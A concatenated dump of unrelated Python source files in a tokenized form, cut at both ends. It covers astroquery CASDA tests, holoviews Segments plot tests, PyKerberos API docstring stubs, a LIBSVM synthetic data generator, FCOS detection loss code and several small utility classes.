'password')<line_sep>casda.POLL_INTERVAL=1<with_stmt>pytest.raises(ValueError)<as>excinfo<block_start>casda.stage_data(table)<block_end><assert_stmt>"You do not have access to any of the requested data files."<in>str(excinfo.value)<block_end><def_stmt>test_stage_data patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-244']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' 'password')<line_sep>casda.POLL_INTERVAL=1<line_sep>urls=casda.stage_data(table verbose=<true>)<assert_stmt>urls<eq>['http://casda.csiro.au/download/web/111-000-111-000/askap_img.fits.checksum' 'http://casda.csiro.au/download/web/111-000-111-000/askap_img.fits']<block_end>
"""Const for notify_events."""<line_sep>DOMAIN="notify_events"<line_sep>
# Source: https://github.com/kenshohara/3D-ResNets-PyTorch/blob/master/mean.py <def_stmt>get_mean norm_value=255 dataset='activitynet'# Below values are in RGB order <block_start><assert_stmt>dataset<in>['activitynet' 'kinetics' 'ucf101']<if_stmt>dataset<eq>'activitynet'<block_start><return>[114.7748/norm_value 107.7354/norm_value 99.4750/norm_value]<block_end><elif_stmt>dataset<eq>'kinetics'# Kinetics (10 videos for each class) <block_start><return>[110.63666788/norm_value 103.16065604/norm_value 96.29023126/norm_value]<block_end><elif_stmt>dataset<eq>'ucf101'<block_start><return>[101.00131/norm_value 97.3644226/norm_value 89.42114168/norm_value]<block_end><block_end><def_stmt>get_std norm_value=255# Kinetics (10 videos for each class) <block_start><return>[38.7568578/norm_value 37.88248729/norm_value 40.02898126/norm_value]<block_end>
<import_stmt>treq<import_from_stmt>klein Klein<line_sep>app=Klein()<line_sep>@app.route("/" branch=<true>)<def_stmt>google request<block_start>d=treq.get("https://www.google.com"+request.uri)<line_sep>d.addCallback(treq.content)<line_sep><return>d<block_end>app.run("localhost" 8080)<line_sep>
<import_from_stmt>.dataset Dataset<class_stmt>TransformDataset(Dataset)<block_start>""" Dataset which transforms a given dataset with a given function. Given a function `transform`, and a `dataset`, `TransformDataset` applies the function in an on-the-fly manner when querying a sample with `__getitem__(idx)` and therefore returning `transform[dataset[idx]]`. `transform` can also be a dict with functions as values. In this case, it is assumed that `dataset[idx]` is a dict which has all the keys in `transform`. Then, `transform[key]` is applied to dataset[idx][key] for each key in `transform` The size of the new dataset is equal to the size of the underlying `dataset`. Purpose: when performing pre-processing operations, it is convenient to be able to perform on-the-fly transformations to a dataset. Args: dataset (Dataset): Dataset which has to be transformed. transforms (function/dict): Function or dict with function as values. These functions will be applied to data. """<def_stmt>__init__ self dataset transforms<block_start>super(TransformDataset self).__init__()<if_stmt><not>(isinstance(transforms dict)<or>callable(transforms))<block_start><raise>AssertionError('expected a dict of transforms or a function')<block_end><if_stmt>isinstance(transforms dict)<block_start><for_stmt>k,v transforms.items()<block_start><if_stmt><not>callable(v)<block_start><raise>AssertionError(str(k)+' is not a function')<block_end><block_end><block_end>self.dataset=dataset<line_sep>self.transforms=transforms<block_end><def_stmt>__len__ self<block_start><return>len(self.dataset)<block_end><def_stmt>__getitem__ self idx<block_start>super(TransformDataset self).__getitem__(idx)<line_sep>z=self.dataset[idx]<if_stmt>isinstance(self.transforms dict)<block_start><for_stmt>k,transform self.transforms.items()<block_start>z[k]=transform(z[k])<block_end><block_end><else_stmt><block_start>z=self.transforms(z)<block_end><return>z<block_end><block_end>
"""Provides LogPipe class to pipe output from subprocess to a log. Adapted from https://codereview.stackexchange.com/questions/6567"""<import_stmt>logging<import_stmt>threading<import_stmt>os<class_stmt>LogPipe(threading.Thread)<block_start><def_stmt>__init__ self logger level<block_start>"""Setup the object with a logger and a loglevel and start the thread"""<line_sep>super(LogPipe self).__init__()<line_sep># threading.Thread.__init__(self) self.logger=logging.getLogger(logger)<line_sep>self.daemon=<false><line_sep>self.level=level<line_sep>self.fdRead,self.fdWrite=os.pipe()<line_sep>self.pipeReader=os.fdopen(self.fdRead)<line_sep>self.start()<block_end><def_stmt>fileno self<block_start>"""Return the write file descriptor of the pipe"""<line_sep><return>self.fdWrite<block_end><def_stmt>run self<block_start>"""Run the thread, logging everything."""<for_stmt>line iter(self.pipeReader.readline '')<block_start>self.logger.log(self.level line.strip('\n'))<block_end>self.pipeReader.close()<block_end><def_stmt>close self<block_start>"""Close the write end of the pipe."""<line_sep>os.close(self.fdWrite)<block_end><block_end>
<import_stmt>logging<import_stmt>requests<import_from_stmt>tenacity before_log retry stop_after_attempt<class_stmt>MarketDataClient(object)<block_start>logger=logging.getLogger(__name__)<line_sep>base_url='http://market-data:8000'<def_stmt>_make_request self url<block_start>response=requests.get(f"{self.base_url}/{url}" headers={'content-type':'application/json'})<line_sep><return>response.json()<block_end>@retry(stop=stop_after_attempt(3) before=before_log(logger logging.DEBUG))<def_stmt>all_prices self<block_start><return>self._make_request("prices")<block_end><def_stmt>price self code<block_start><return>self._make_request(f"prices/{code}")<block_end><block_end>
<import_from_stmt>unittest SkipTest<import_from_stmt>holoviews.core NdOverlay<import_from_stmt>holoviews.core.util pd<import_from_stmt>holoviews.element Segments<import_from_stmt>.test_plot TestBokehPlot bokeh_renderer<try_stmt><block_start><import_from_stmt>bokeh.models FactorRange<block_end><except_stmt><block_start><pass><block_end><class_stmt>TestSegmentPlot(TestBokehPlot)<block_start><def_stmt>test_segments_color_selection_nonselection self<block_start>opts=dict(color='green' selection_color='red' nonselection_color='blue')<line_sep>segments=Segments([(i i<times>2 i<times>3 i<times>4 i<times>5 chr(65+i))<for>i range(10)] vdims=['a' 'b']).opts(**opts)<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>glyph_renderer=plot.handles['glyph_renderer']<line_sep>self.assertEqual(glyph_renderer.glyph.line_color 'green')<line_sep>self.assertEqual(glyph_renderer.selection_glyph.line_color 'red')<line_sep>self.assertEqual(glyph_renderer.nonselection_glyph.line_color 'blue')<block_end><def_stmt>test_segments_alpha_selection_nonselection self<block_start>opts=dict(alpha=0.8 selection_alpha=1.0 nonselection_alpha=0.2)<line_sep>segments=Segments([(i i<times>2 i<times>3 i<times>4 i<times>5 chr(65+i))<for>i range(10)] vdims=['a' 'b']).opts(**opts)<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>glyph_renderer=plot.handles['glyph_renderer']<line_sep>self.assertEqual(glyph_renderer.glyph.line_alpha 0.8)<line_sep>self.assertEqual(glyph_renderer.selection_glyph.line_alpha 1)<line_sep>self.assertEqual(glyph_renderer.nonselection_glyph.line_alpha 0.2)<block_end><def_stmt>test_segments_overlay_hover self<block_start>obj=NdOverlay({i:Segments((range(31) range(31) range(1 32) range(31)))<for>i range(5)} kdims=['Test']).opts({'Segments':{'tools':['hover']}})<line_sep>tooltips=[('Test' '@{Test}') ('x0' '@{x0}') ('y0' '@{y0}') ('x1' '@{x1}') ('y1' '@{y1}')]<line_sep>self._test_hover_info(obj tooltips)<block_end><def_stmt>test_segments_overlay_datetime_hover self<block_start><if_stmt>pd<is><none><block_start><raise>SkipTest("Test requires pandas")<block_end>obj=NdOverlay({i:Segments((list(pd.date_range('2016-01-01' '2016-01-31')) range(31) pd.date_range('2016-01-02' '2016-02-01') range(31)))<for>i range(5)} kdims=['Test']).opts({'Segments':{'tools':['hover']}})<line_sep>tooltips=[('Test' '@{Test}') ('x0' '@{x0}{%F %T}') ('y0' '@{y0}') ('x1' '@{x1}{%F %T}') ('y1' '@{y1}')]<line_sep>formatters={'@{x0}':"datetime" '@{x1}':"datetime"}<line_sep>self._test_hover_info(obj tooltips formatters=formatters)<block_end><def_stmt>test_segments_categorical_xaxis self<block_start>segments=Segments((['A' 'B' 'C'] [1 2 3] ['A' 'B' 'C'] [4 5 6]))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>x_range=plot.handles['x_range']<line_sep>self.assertIsInstance(x_range FactorRange)<line_sep>self.assertEqual(x_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_categorical_yaxis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_categorical_yaxis_invert_axes self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_overlay_categorical_yaxis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C' 'D'])<block_end><def_stmt>test_segments_overlay_categorical_yaxis_invert_axis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C'])).opts(invert_yaxis=<true>)<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C' 'D'][::-1])<block_end><def_stmt>test_segments_overlay_categorical_yaxis_invert_axes self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C'])).opts(invert_axes=<true>)<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>x_range=plot.handles['x_range']<line_sep>self.assertIsInstance(x_range FactorRange)<line_sep>self.assertEqual(x_range.factors ['A' 'B' 'C' 'D'])<block_end><block_end>
## # Copyright (c) 2006-2018 Apple Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## """ PyKerberos Function Description. """<class_stmt>KrbError(Exception)<block_start><pass><block_end><class_stmt>BasicAuthError(KrbError)<block_start><pass><block_end><class_stmt>GSSError(KrbError)<block_start><pass><block_end><def_stmt>checkPassword user pswd service default_realm<block_start>""" This function provides a simple way to verify that a user name and password match those normally used for Kerberos authentication. It does this by checking that the supplied user name and password can be used to get a ticket for the supplied service. If the user name does not contain a realm, then the default realm supplied is used. For this to work properly the Kerberos must be configured properly on this machine. That will likely mean ensuring that the edu.mit.Kerberos preference file has the correct realms and KDCs listed. IMPORTANT: This method is vulnerable to KDC spoofing attacks and it should only used for testing. Do not use this in any production system - your security could be compromised if you do. @param user: A string containing the Kerberos user name. A realm may be included by appending an C{"@"} followed by the realm string to the actual user id. If no realm is supplied, then the realm set in the default_realm argument will be used. @param pswd: A string containing the password for the user. @param service: A string containing the Kerberos service to check access for. This will be of the form C{"sss/xx.yy.zz"}, where C{"sss"} is the service identifier (e.g., C{"http"}, C{"krbtgt"}), and C{"xx.yy.zz"} is the hostname of the server. @param default_realm: A string containing the default realm to use if one is not supplied in the user argument. Note that Kerberos realms are normally all uppercase (e.g., C{"EXAMPLE.COM"}). @return: True if authentication succeeds, false otherwise. """<block_end><def_stmt>changePassword user oldpswd newpswd<block_start>""" This function allows to change the user password on the KDC. @param user: A string containing the Kerberos user name. A realm may be included by appending a C{"@"} followed by the realm string to the actual user id. If no realm is supplied, then the realm set in the default_realm argument will be used. @param oldpswd: A string containing the old (current) password for the user. @param newpswd: A string containing the new password for the user. @return: True if password changing succeeds, false otherwise. """<block_end><def_stmt>getServerPrincipalDetails service hostname<block_start>""" This function returns the service principal for the server given a service type and hostname. Details are looked up via the C{/etc/keytab} file. @param service: A string containing the Kerberos service type for the server. @param hostname: A string containing the hostname of the server. @return: A string containing the service principal. """<block_end>""" GSSAPI Function Result Codes: -1 : Error 0 : GSSAPI step continuation (only returned by 'Step' function) 1 : GSSAPI step complete, or function return OK """<line_sep># Some useful result codes AUTH_GSS_CONTINUE=0<line_sep>AUTH_GSS_COMPLETE=1<line_sep># Some useful gss flags GSS_C_DELEG_FLAG=1<line_sep>GSS_C_MUTUAL_FLAG=2<line_sep>GSS_C_REPLAY_FLAG=4<line_sep>GSS_C_SEQUENCE_FLAG=8<line_sep>GSS_C_CONF_FLAG=16<line_sep>GSS_C_INTEG_FLAG=32<line_sep>GSS_C_ANON_FLAG=64<line_sep>GSS_C_PROT_READY_FLAG=128<line_sep>GSS_C_TRANS_FLAG=256<def_stmt>authGSSClientInit service **kwargs<block_start>""" Initializes a context for GSSAPI client-side authentication with the given service principal. L{authGSSClientClean} must be called after this function returns an OK result to dispose of the context once all GSSAPI operations are complete. @param service: A string containing the service principal in the form C{"type@fqdn"}. @param principal: Optional string containing the client principal in the form C{"user@realm"}. @param gssflags: Optional integer used to set GSS flags. (e.g. C{GSS_C_DELEG_FLAG|GSS_C_MUTUAL_FLAG|GSS_C_SEQUENCE_FLAG} will allow for forwarding credentials to the remote host) @param delegated: Optional server context containing delegated credentials @param mech_oid: Optional GGS mech OID @return: A tuple of (result, context) where result is the result code (see above) and context is an opaque value that will need to be passed to subsequent functions. """<block_end><def_stmt>authGSSClientClean context<block_start>""" Destroys the context for GSSAPI client-side authentication. This function is provided for compatibility with earlier versions of PyKerberos but does nothing. The context object destroys itself when it is reclaimed. @param context: The context object returned from L{authGSSClientInit}. @return: A result code (see above). """<block_end><def_stmt>authGSSClientInquireCred context<block_start>""" Get the current user name, if any, without a client-side GSSAPI step. If the principal has already been authenticated via completed client-side GSSAPI steps then the user name of the authenticated principal is kept. The user name will be available via authGSSClientUserName. @param context: The context object returned from L{authGSSClientInit}. @return: A result code (see above). """<block_end>""" Address Types for Channel Bindings https://docs.oracle.com/cd/E19455-01/806-3814/6jcugr7dp/index.html#reference-9 """<line_sep>GSS_C_AF_UNSPEC=0<line_sep>GSS_C_AF_LOCAL=1<line_sep>GSS_C_AF_INET=2<line_sep>GSS_C_AF_IMPLINK=3<line_sep>GSS_C_AF_PUP=4<line_sep>GSS_C_AF_CHAOS=5<line_sep>GSS_C_AF_NS=6<line_sep>GSS_C_AF_NBS=7<line_sep>GSS_C_AF_ECMA=8<line_sep>GSS_C_AF_DATAKIT=9<line_sep>GSS_C_AF_CCITT=10<line_sep>GSS_C_AF_SNA=11<line_sep>GSS_C_AF_DECnet=12<line_sep>GSS_C_AF_DLI=13<line_sep>GSS_C_AF_LAT=14<line_sep>GSS_C_AF_HYLINK=15<line_sep>GSS_C_AF_APPLETALK=16<line_sep>GSS_C_AF_BSC=17<line_sep>GSS_C_AF_DSS=18<line_sep>GSS_C_AF_OSI=19<line_sep>GSS_C_AF_X25=21<line_sep>GSS_C_AF_NULLADDR=255<def_stmt>channelBindings **kwargs<block_start>""" Builds a gss_channel_bindings_struct which can be used to pass onto L{authGSSClientStep} to bind onto the auth. Details on Channel Bindings can be foud at https://tools.ietf.org/html/rfc5929. More details on the struct can be found at https://docs.oracle.com/cd/E19455-01/806-3814/overview-52/index.html @param initiator_addrtype: Optional integer used to set the initiator_addrtype, defaults to GSS_C_AF_UNSPEC if not set @param initiator_address: Optional byte string containing the initiator_address @param acceptor_addrtype: Optional integer used to set the acceptor_addrtype, defaults to GSS_C_AF_UNSPEC if not set @param acceptor_address: Optional byte string containing the acceptor_address @param application_data: Optional byte string containing the application_data. An example would be 'tls-server-end-point:{cert-hash}' where {cert-hash} is the hash of the server's certificate @return: A tuple of (result, gss_channel_bindings_struct) where result is the result code and gss_channel_bindings_struct is the channel bindings structure that can be passed onto L{authGSSClientStep} """<block_end><def_stmt>authGSSClientStep context challenge **kwargs<block_start>""" Processes a single GSSAPI client-side step using the supplied server data. @param context: The context object returned from L{authGSSClientInit}. @param challenge: A string containing the base64-encoded server data (which may be empty for the first step). @param channel_bindings: Optional channel bindings to bind onto the auth request. This struct can be built using :{channelBindings} and if not specified it will pass along GSS_C_NO_CHANNEL_BINDINGS as a default. @return: A result code (see above). """<block_end><def_stmt>authGSSClientResponse context<block_start>""" Get the client response from the last successful GSSAPI client-side step. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the base64-encoded client data to be sent to the server. """<block_end><def_stmt>authGSSClientResponseConf context<block_start>""" Determine whether confidentiality was enabled in the previously unwrapped buffer. @param context: The context object returned from L{authGSSClientInit}. @return: C{1} if confidentiality was enabled in the previously unwrapped buffer, C{0} otherwise. """<block_end><def_stmt>authGSSClientUserName context<block_start>""" Get the user name of the principal authenticated via the now complete GSSAPI client-side operations, or the current user name obtained via authGSSClientInquireCred. This method must only be called after authGSSClientStep or authGSSClientInquireCred return a complete response code. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the user name. """<block_end><def_stmt>authGSSClientUnwrap context challenge<block_start>""" Perform the client side GSSAPI unwrap step. @param challenge: A string containing the base64-encoded server data. @return: A result code (see above) """<block_end><def_stmt>authGSSClientWrap context data user=<none> protect=0<block_start>""" Perform the client side GSSAPI wrap step. @param data: The result of the L{authGSSClientResponse} after the L{authGSSClientUnwrap}. @param user: The user to authorize. @param protect: If C{0}, then just provide integrity protection. If C{1}, then provide confidentiality as well. @return: A result code (see above) """<block_end><def_stmt>authGSSServerInit service<block_start>""" Initializes a context for GSSAPI server-side authentication with the given service principal. authGSSServerClean must be called after this function returns an OK result to dispose of the context once all GSSAPI operations are complete. @param service: A string containing the service principal in the form C{"type@fqdn"}. To initialize the context for the purpose of accepting delegated credentials, pass the literal string C{"DELEGATE"}. @return: A tuple of (result, context) where result is the result code (see above) and context is an opaque value that will need to be passed to subsequent functions. """<block_end><def_stmt>authGSSServerClean context<block_start>""" Destroys the context for GSSAPI server-side authentication. This function is provided for compatibility with earlier versions of PyKerberos but does nothing. The context object destroys itself when it is reclaimed. @param context: The context object returned from L{authGSSClientInit}. @return: A result code (see above). """<block_end><def_stmt>authGSSServerStep context challenge<block_start>""" Processes a single GSSAPI server-side step using the supplied client data. @param context: The context object returned from L{authGSSClientInit}. @param challenge: A string containing the base64-encoded client data. @return: A result code (see above). """<block_end><def_stmt>authGSSServerResponse context<block_start>""" Get the server response from the last successful GSSAPI server-side step. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the base64-encoded server data to be sent to the client. """<block_end><def_stmt>authGSSServerHasDelegated context<block_start>""" Checks whether a server context has delegated credentials. @param context: The context object returned from L{authGSSClientInit}. @return: A bool saying whether delegated credentials are available. """<block_end><def_stmt>authGSSServerUserName context<block_start>""" Get the user name of the principal trying to authenticate to the server. This method must only be called after L{authGSSServerStep} returns a complete or continue response code. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the user name. """<block_end><def_stmt>authGSSServerTargetName context<block_start>""" Get the target name if the server did not supply its own credentials. This method must only be called after L{authGSSServerStep} returns a complete or continue response code. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the target name. """<block_end><def_stmt>authGSSServerStoreDelegate context<block_start>""" Save the ticket sent to the server in the file C{/tmp/krb5_pyserv_XXXXXX}. This method must only be called after L{authGSSServerStep} returns a complete or continue response code. @param context: The context object returned from L{authGSSClientInit}. @return: A result code (see above). """<block_end><def_stmt>authGSSServerCacheName context<block_start>""" Get the name of the credential cache created with L{authGSSServerStoreDelegate}. This method must only be called after L{authGSSServerStoreDelegate}. @param context: The context object returned from L{authGSSClientInit}. @return: A string containing the cache name. """<block_end>
"""Generate synthetic data in LIBSVM format."""<import_stmt>argparse<import_stmt>io<import_stmt>time<import_stmt>numpy<as>np<import_from_stmt>sklearn.datasets make_classification<import_from_stmt>sklearn.model_selection train_test_split<line_sep>RNG=np.random.RandomState(2019)<def_stmt>generate_data args<block_start>"""Generates the data."""<line_sep>print("Generating dataset: {} rows * {} columns".format(args.rows args.columns))<line_sep>print("Sparsity {}".format(args.sparsity))<line_sep>print("{}/{} train/test split".format(1.0-args.test_size args.test_size))<line_sep>tmp=time.time()<line_sep>n_informative=args.columns<times>7<floordiv>10<line_sep>n_redundant=args.columns<floordiv>10<line_sep>n_repeated=args.columns<floordiv>10<line_sep>print("n_informative: {}, n_redundant: {}, n_repeated: {}".format(n_informative n_redundant n_repeated))<line_sep>x,y=make_classification(n_samples=args.rows n_features=args.columns n_informative=n_informative n_redundant=n_redundant n_repeated=n_repeated shuffle=<false> random_state=RNG)<line_sep>print("Generate Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>x_train,x_test,y_train,y_test=train_test_split(x y test_size=args.test_size random_state=RNG shuffle=<false>)<line_sep>print("Train/Test Split Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>write_file('train.libsvm' x_train y_train args.sparsity)<line_sep>print("Write Train Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>write_file('test.libsvm' x_test y_test args.sparsity)<line_sep>print("Write Test Time: {} seconds".format(time.time()-tmp))<block_end><def_stmt>write_file filename x_data y_data sparsity<block_start><with_stmt>open(filename 'w')<as>f<block_start><for_stmt>x,y zip(x_data y_data)<block_start>write_line(f x y sparsity)<block_end><block_end><block_end><def_stmt>write_line f x y sparsity<block_start><with_stmt>io.StringIO()<as>line<block_start>line.write(str(y))<for_stmt>i,col enumerate(x)<block_start><if_stmt>0.0<l>sparsity<l>1.0<block_start><if_stmt>RNG.uniform(0 1)<g>sparsity<block_start>write_feature(line i col)<block_end><block_end><else_stmt><block_start>write_feature(line i col)<block_end><block_end>line.write('\n')<line_sep>f.write(line.getvalue())<block_end><block_end><def_stmt>write_feature line index feature<block_start>line.write(' ')<line_sep>line.write(str(index))<line_sep>line.write(':')<line_sep>line.write(str(feature))<block_end><def_stmt>main <block_start>"""The main function. Defines and parses command line arguments and calls the generator. """<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--rows' type=int default=1000000)<line_sep>parser.add_argument('--columns' type=int default=50)<line_sep>parser.add_argument('--sparsity' type=float default=0.0)<line_sep>parser.add_argument('--test_size' type=float default=0.01)<line_sep>args=parser.parse_args()<line_sep>generate_data(args)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
""" This file contains specific functions for computing losses of FCOS file """<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<import_from_stmt>maskrcnn_benchmark.layers IOULoss<import_from_stmt>maskrcnn_benchmark.layers SigmoidFocalLoss<import_from_stmt>maskrcnn_benchmark.utils.comm reduce_sum get_world_size<import_from_stmt>maskrcnn_benchmark.layers smooth_l1_loss<line_sep>INF=100000000<class_stmt>FCOSLossComputation(object)<block_start>""" This class computes the FCOS losses. """<def_stmt>__init__ self cfg<block_start>self.cls_loss_func=SigmoidFocalLoss(cfg.MODEL.FCOS.LOSS_GAMMA cfg.MODEL.FCOS.LOSS_ALPHA)<line_sep>self.center_sample=cfg.MODEL.FCOS.CENTER_SAMPLE<line_sep>self.strides=cfg.MODEL.FCOS.FPN_STRIDES<line_sep>self.radius=cfg.MODEL.FCOS.POS_RADIUS<line_sep>self.loc_loss_type=cfg.MODEL.FCOS.LOC_LOSS_TYPE<line_sep># we make use of IOU Loss for bounding boxes regression, # but we found that L1 in log scale can yield a similar performance self.box_reg_loss_func=IOULoss(self.loc_loss_type)<line_sep>self.centerness_loss_func=nn.BCEWithLogitsLoss(reduction="sum")<line_sep># generate sizes of interest soi=[]<line_sep>prev_size=-1<for_stmt>s cfg.MODEL.FCOS.SIZES_OF_INTEREST<block_start>soi.append([prev_size s])<line_sep>prev_size=s<block_end>soi.append([prev_size INF])<line_sep>self.object_sizes_of_interest=soi<block_end><def_stmt>get_sample_region self gt strides num_points_per gt_xs gt_ys radius=1<block_start>num_gts=gt.shape[0]<line_sep>K=len(gt_xs)<line_sep>gt=gt[<none>].expand(K num_gts 4)<line_sep>center_x=(gt[<ellipsis> 0]+gt[<ellipsis> 2])/2<line_sep>center_y=(gt[<ellipsis> 1]+gt[<ellipsis> 3])/2<line_sep>center_gt=gt.new_zeros(gt.shape)<line_sep># no gt <if_stmt>center_x[<ellipsis> 0].sum()<eq>0<block_start><return>gt_xs.new_zeros(gt_xs.shape dtype=torch.uint8)<block_end>beg=0<for_stmt>level,n_p enumerate(num_points_per)<block_start>end=beg+n_p<line_sep>stride=strides[level]<times>radius<line_sep>xmin=center_x[beg:end]-stride<line_sep>ymin=center_y[beg:end]-stride<line_sep>xmax=center_x[beg:end]+stride<line_sep>ymax=center_y[beg:end]+stride<line_sep># limit sample region in gt center_gt[beg:end : 0]=torch.where(xmin<g>gt[beg:end : 0] xmin gt[beg:end : 0])<line_sep>center_gt[beg:end : 1]=torch.where(ymin<g>gt[beg:end : 1] ymin gt[beg:end : 1])<line_sep>center_gt[beg:end : 2]=torch.where(xmax<g>gt[beg:end : 2] gt[beg:end : 2] xmax)<line_sep>center_gt[beg:end : 3]=torch.where(ymax<g>gt[beg:end : 3] gt[beg:end : 3] ymax)<line_sep>beg=end<block_end>left=gt_xs[: <none>]-center_gt[<ellipsis> 0]<line_sep>right=center_gt[<ellipsis> 2]-gt_xs[: <none>]<line_sep>top=gt_ys[: <none>]-center_gt[<ellipsis> 1]<line_sep>bottom=center_gt[<ellipsis> 3]-gt_ys[: <none>]<line_sep>center_bbox=torch.stack((left top right bottom) -1)<line_sep>inside_gt_bbox_mask=center_bbox.min(-1)[0]<g>0<line_sep><return>inside_gt_bbox_mask<block_end><def_stmt>prepare_targets self points targets<block_start>object_sizes_of_interest=self.object_sizes_of_interest<line_sep>expanded_object_sizes_of_interest=[]<for_stmt>l,points_per_level enumerate(points)<block_start>object_sizes_of_interest_per_level=points_per_level.new_tensor(object_sizes_of_interest[l])<line_sep>expanded_object_sizes_of_interest.append(object_sizes_of_interest_per_level[<none>].expand(len(points_per_level) -1))<block_end>expanded_object_sizes_of_interest=torch.cat(expanded_object_sizes_of_interest dim=0)<line_sep>num_points_per_level=[len(points_per_level)<for>points_per_level points]<line_sep>self.num_points_per_level=num_points_per_level<line_sep>points_all_level=torch.cat(points dim=0)<line_sep>labels,reg_targets,bezier_targets=self.compute_targets_for_locations(points_all_level targets expanded_object_sizes_of_interest)<for_stmt>i range(len(labels))<block_start>labels[i]=torch.split(labels[i] num_points_per_level dim=0)<line_sep>reg_targets[i]=torch.split(reg_targets[i] num_points_per_level dim=0)<line_sep>bezier_targets[i]=torch.split(bezier_targets[i] num_points_per_level dim=0)<block_end>labels_level_first=[]<line_sep>reg_targets_level_first=[]<line_sep>bezier_targets_level_first=[]<for_stmt>level range(len(points))<block_start>labels_level_first.append(torch.cat([labels_per_im[level]<for>labels_per_im labels] dim=0))<line_sep># normalize regression targets reg_targets_level_first.append(torch.cat([reg_targets_per_im[level]<for>reg_targets_per_im reg_targets] dim=0)/self.strides[level])<line_sep>bezier_targets_level_first.append(torch.cat([bezier_targets_per_im[level]<for>bezier_targets_per_im bezier_targets] dim=0)/self.strides[level])<block_end><return>labels_level_first reg_targets_level_first bezier_targets_level_first<block_end><def_stmt>compute_targets_for_locations self locations targets object_sizes_of_interest<block_start>labels=[]<line_sep>reg_targets=[]<line_sep>bezier_targets=[]<line_sep>xs,ys=locations[: 0] locations[: 1]<for_stmt>im_i range(len(targets))<block_start>targets_per_im=targets[im_i]<assert_stmt>targets_per_im.mode<eq>"xyxy"<line_sep>bboxes=targets_per_im.bbox<line_sep>labels_per_im=targets_per_im.get_field("labels")<line_sep>area=targets_per_im.area()<line_sep>l=xs[: <none>]-bboxes[: 0][<none>]<line_sep>t=ys[: <none>]-bboxes[: 1][<none>]<line_sep>r=bboxes[: 2][<none>]-xs[: <none>]<line_sep>b=bboxes[: 3][<none>]-ys[: <none>]<line_sep>reg_targets_per_im=torch.stack([l t r b] dim=2)<line_sep># bezier points are relative distances from center to control points bezier_pts=targets_per_im.get_field("beziers").bbox.view(-1 8 2)<line_sep>y_targets=bezier_pts[: : 0][<none>]-ys[: <none> <none>]<line_sep>x_targets=bezier_pts[: : 1][<none>]-xs[: <none> <none>]<line_sep>bezier_targets_per_im=torch.stack((y_targets x_targets) dim=3)<line_sep>bezier_targets_per_im=bezier_targets_per_im.view(xs.size(0) bboxes.size(0) 16)<if_stmt>self.center_sample<block_start>is_in_boxes=self.get_sample_region(bboxes self.strides self.num_points_per_level xs ys radius=self.radius)<block_end><else_stmt><block_start>is_in_boxes=reg_targets_per_im.min(dim=2)[0]<g>0<block_end>max_reg_targets_per_im=reg_targets_per_im.max(dim=2)[0]<line_sep># limit the regression range for each location is_cared_in_the_level=(max_reg_targets_per_im<ge>object_sizes_of_interest[: [0]])&(max_reg_targets_per_im<le>object_sizes_of_interest[: [1]])<line_sep>locations_to_gt_area=area[<none>].repeat(len(locations) 1)<line_sep>locations_to_gt_area[is_in_boxes<eq>0]=INF<line_sep>locations_to_gt_area[is_cared_in_the_level<eq>0]=INF<line_sep># if there are still more than one objects for a location, # we choose the one with minimal area locations_to_min_aera,locations_to_gt_inds=locations_to_gt_area.min(dim=1)<line_sep>reg_targets_per_im=reg_targets_per_im[range(len(locations)) locations_to_gt_inds]<line_sep>bezier_targets_per_im=bezier_targets_per_im[range(len(locations)) 